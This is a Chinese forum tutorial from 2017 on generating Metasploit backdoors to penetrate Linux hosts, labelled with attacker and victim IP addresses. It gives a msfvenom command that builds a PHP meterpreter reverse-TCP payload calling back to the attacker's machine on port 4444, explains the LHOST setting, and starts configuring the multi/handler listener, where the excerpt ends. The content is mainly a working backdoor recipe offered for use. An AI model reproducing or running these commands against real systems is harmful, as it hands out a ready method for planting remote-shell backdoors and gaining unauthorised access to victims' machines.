本帖最后由 小爱_Joker 于 2017-3-9 12:30 编辑
标题:Metasploit后门渗透Linux系统以及跨平台后门生成
作者:小爱_Joker
难度:两级
阅读点:使用Metasploit生成多种后门从而快速渗透linux系统上次发的那个Metasploit使用php后门渗透linux主机 不造为啥不能shell 使用终端 有点尴尬。
攻击者IP:192.168.0.5
受害者IP:192.168.0.3
1:PHP后门生成
[AppleScript] 纯文本查看 复制代码msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.5 -f raw >/root/桌面/test.php
QQ截图20170308141854.png (388.35 KB, 下载次数: 83)
2017-3-9 17:47 上传
首先先来讲解一下LHOST= 什么意思 LHOST 是本机IP地址 也就是在内网中的 不知道的可以ifconfig 查看一下 由于我虚拟机是直接复制的物理机网络所以直接使用eth0
QQ截图20170308141440.png (415.41 KB, 下载次数: 124)
2017-3-9 17:47 上传
PHP后门生成如下图
QQ截图20170308141705.png (439.06 KB, 下载次数: 94)
2017-3-9 17:47 上传
$ip = '192.168.0.5'; $port = 4444 192.168.0.5是我在内网中的IP 上面已经说过了 这个4444 就是我监听的端口 上面我没有配置监听端口 Msf默认监听端口为:4444
配置Metasploit
[AppleScript] 纯文本查看 复制代码msf > use exploit/multi/handler //使用模块